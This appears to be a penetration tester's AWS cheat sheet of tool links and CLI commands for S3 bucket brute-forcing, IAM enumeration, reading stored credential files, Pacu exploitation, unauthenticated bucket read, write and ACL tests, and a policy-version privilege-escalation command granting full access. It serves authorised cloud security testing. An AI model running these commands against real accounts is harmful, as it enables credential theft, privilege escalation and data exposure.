AWS

Recon

awsome-websecurity-checklist/Mindmaps/S3-Bucket Recon.png at main · securitycipher/awsome-websecurity-checklistGitHub

s3enum

GitHub - koenrh/s3enum: Fast and stealthy Amazon S3 bucket enumeration tool for pentesters.GitHub

lazys3

GitHub - nahamsec/lazys3GitHub

BucketLoot

Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

GitHub - redhuntlabs/BucketLoot: BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.GitHub

Bruteforce S3 buckets

GitHub - koaj/aws-s3-bucket-wordlist: Most common AWS S3 bucket names.GitHub

regions.txt

us-west-1
us-west-2
us-east-1
us-east-2
cn-north-1
cn-northwest-1
eu-central-1
eu-north-1
eu-west-1
eu-west-2
eu-west-3
ap-northeast-1
ap-northeast-2
ap-northeast-3
ap-south-1
ap-southeast-1
ap-southeast-2
ca-central-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
ap-east-1

https://raw.githubusercontent.com/koaj/aws-s3-bucket-wordlist/master/list.txt

ffuf -u "https://hlogistics-ENVIRONMENT.s3.REGION.amazonaws.com" -w "regions.txt:REGION" -w "list.txt:ENVIRONMENT" -mc 200,403 -v 2>/dev/null

S3 Bucket Brute Force to BreachMedium

AWSBucketDump

GitHub - jordanpotti/AWSBucketDump: Security Tool to Look For Interesting Files in S3 BucketsGitHub

CloudShovel

GitHub - saw-your-packet/CloudShovel: A tool for scanning public or private AMIs for sensitive files and secrets. The tool follows the research made on AWS CloudQuarry where we scanned 20k+ public AMIs.GitHub

Enumeration without authentication

GitHub - Ty182/Tools_by_Tyler: A collection of custom tooling I've builtGitHub

AWS CLI

Configure a named profile

aws configure --profile [profile-name]

configure — AWS CLI 1.36.4 Command Reference

Or

aws configure set aws_access_key_id [key-id] --profile [profile-name]
aws configure set aws_secret_access_key [key-id] --profile [profile-name]
aws configure set aws_session_token [token] --profile [profile-name]
aws sts get-caller-identity --profile [profile-name]

Or

$ export AWS_ACCESS_KEY_ID=<AWS_ACCESS_KEY_ID>
$ export AWS_SECRET_ACCESS_KEY=<AWS_SECRET_ACCESS_KEY>
$ export AWS_SESSION_TOKEN=<AWS_SESSION_TOKEN>
$ aws configure

Environment variables to configure the AWS CLI - AWS Command Line InterfaceAWS Command Line Interface

Information about configured identity

aws sts get-caller-identity --profile [profile-name]

get-caller-identity — AWS CLI 1.23.12 Command Reference

Stored Credentials

Windows

C:\Users\UserName\.aws

Linux

/home/UserName/.aws

cat credentials

Enumeration - Users

aws iam list-users

# With profile
aws iam list-users --profile [profile-name]

List the IAM groups that the specified IAM user belongs to :

aws iam list-groups-for-user --user-name [user-name]

List all manages policies that are attached to the specified IAM user :

aws iam list-attached-user-policies --user-name [user-name]

# With profile
aws iam list-attached-user-policies --user-name [user-name] --profile [profile-name]

Lists the names of the inline policies embedded in the specified IAM user :

aws iam list-user-policies --user-name [user-name]

Enumeration - Groups

IAM Groups

aws iam list-groups

All users in a group

aws iam get-group --group-name [group-name]

All managed policies that are attached to the specified IAM Group

aws iam list-attached-group-policies --group-name [group-name]

Names of the inline policies embedded in the specified IAM Group

aws iam list-group-policies --group-name [group-name]

Enumeration - Roles

List of IAM Roles

aws iam list-roles

All managed policies that are attached to the specified IAM role

aws iam list-attached-role-policies --role-name [ role-name]

Names of the inline policies embedded in the specified IAM role

aws iam list-role-policies --role-name [ role-name]

Enumeration - Policies

List of all iam policies

aws iam list-policies

Information about the specified managed policy

aws iam get-policy --policy-arn [policy-arn]

# With profile
aws iam get-policy --policy-arn [policy-arn] --profile [profile-name]

Information about the versions of the specified manages policy

aws iam list-policy-versions --policy-arn [policy-arn]

Information about the specified version of the specified managed policy

aws iam get-policy-version --policy-arn [policy-arn] --version-id [version-id]

# With profile
aws iam get-policy-version --policy-arn [policy-arn] --version-id [version-id] --profile [profile-name]

One of the permissions is iam:CreatePolicyVersion ? Use this to create a new version of the attached policy with privileged access

aws iam create-policy-version --policy-arn [policy-arn] --policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Action":"*","Resource":"*"}]}' --set-as-default --profile [profile-name]

Specified inline policy document that is embedded on the specified IAM user / group / role

aws iam get-user-policy --user-name user-name --policy-name [policy-name]
aws iam get-group-policy --group-name group-name --policy-name [policy-name]
aws iam get-role-policy --role-name role-name --policy-name [policy-name]

Enumeration - Cloud Services (EC2, S3 etc.) in an Organization AWS Account

aws ec2 describe-instances --profile [profile-name]

SSRF

SSRF / RCE

Pacu

GitHub - RhinoSecurityLabs/pacu: The AWS exploitation framework, designed for testing the security of Amazon Web Services environments.GitHub

Setting the initial user access key

set_keys

Permission of current logged-in user

exec iam__enum_permissions
whoami

Enumerate ec2 instance and get the public ip addresses

exec ec2__enum
data EC2

Enumerate privilege escalation permission and exploit it

exec iam__privesc_scan

Beginner's Guide to hunting for AWS IAM Privilege Escalations with PacuPwned Labs

Subdomain Takeover

AWS Elastic Beanstalk

Using PD tools to find my first subdomain takeoverProjectDiscovery Blog

DNS (53)

IAM Enumeration

GitHub - andresriancho/enumerate-iam: Enumerate the permissions associated with AWS credential setGitHub

Privilege escalation opportunities in IAM configurations

GitHub - tenable/EscalateGPT: An AI-powered tool for discovering privilege escalation opportunities in AWS IAM configurations.GitHub

IAM Security Assessment

GitHub - salesforce/cloudsplaining: Cloudsplaining is an AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized report.GitHub

Metadata

Unauthorized Access to Metadata and User Data

GitHub - Lu3ky13/Unauthorized-Access-to-Metadata-and-User-Data-like-CTF: Unauthorized Access to Metadata and User Data like CTFGitHub

S3 Misconfiguration - Permissions

Hacking misconfigured AWS S3 buckets: A complete guideIntigriti

S3Scanner

GitHub - sa7mon/S3Scanner: Scan for open S3 buckets and dump the contentsGitHub

Checkov

checkov

Nuclei Templates

AWS Cloud Security Config Review using Nuclei TemplatesProjectDiscovery Blog

AWS Extender - Burp Extension

GitHub - VirtueSecurity/aws-extender: AWS Extender (Cloud Storage Tester) is a Burp plugin to assess permissions of cloud storage containers on AWS, Google Cloud and Azure.GitHub

List Permissions

aws s3 ls s3://{BUCKET_NAME} --no-sign-request

Read Permissions

aws s3api get-object --bucket {BUCKET_NAME} --key archive.zip ./OUTPUT --no-sign-request

Download Permissions

aws s3 cp s3://{BUCKET_NAME}/intigriti.txt ./ --no-sign-request

Write Permissions

aws s3 cp intigriti.txt s3://{BUCKET_NAME}/intigriti-ac5765a7-1337-4543-ab45-1d3c8b468ad3.txt --no-sign-request

Make sure to use a filename with a non-trivial name to prevent any disruption

Read Permissions on ACL

aws s3api get-bucket-acl --bucket {BUCKET_NAME} --no-sign-request

aws s3api get-object-acl --bucket {BUCKET_NAME} --key index.html --no-sign-request

Write Permissions on ACL

aws s3api put-bucket-acl --bucket {BUCKET_NAME} --grant-full-control emailaddress={EMAIL} --no-sign-request

You do not have to always necessarily change an ACL to test for write permissions if read permissions are enabled. You can simply check the "Grants" property in the response to a read operation and verify if any unauthorized users are allowed to perform the write operation!

S3 Versioning

aws s3api get-bucket-versioning --bucket {BUCKET_NAME} --no-sign-request

S3 - Shadow Resources

Bucket Monopoly: Breaching AWS Accounts Through Shadow ResourcesAqua

Security Groups - Segmentation

My AWS “Segmentation Test” Methodology for Pentesters v1.0Medium

GitHub - SherifTalaat/AWS-SG-Analyzer: Python script to analyze and extract all Security Groups informationGitHub

AWS Attack Path Management Tool

GitHub - hotnops/apeman: AWS Attack Path Management Tool - Walking on the MoonGitHub

Persistence - IAM Role Anywhere

An attacker with sufficient permissions could exploit IAM Roles Anywhere to gain persistent access to an AWS account

MyScripts/AWS/setup_roles_anywhere.sh at main · adanalvarez/MyScriptsGitHub

How Attackers Can Abuse IAM Roles Anywhere for Persistent AWS AccessMedium

Resources

AWS PentestingHackTricks Cloud

AWS CLI Tips and Tricks - Hacking The Cloud

AWS penetration testing: A step-by-step guideHack The Box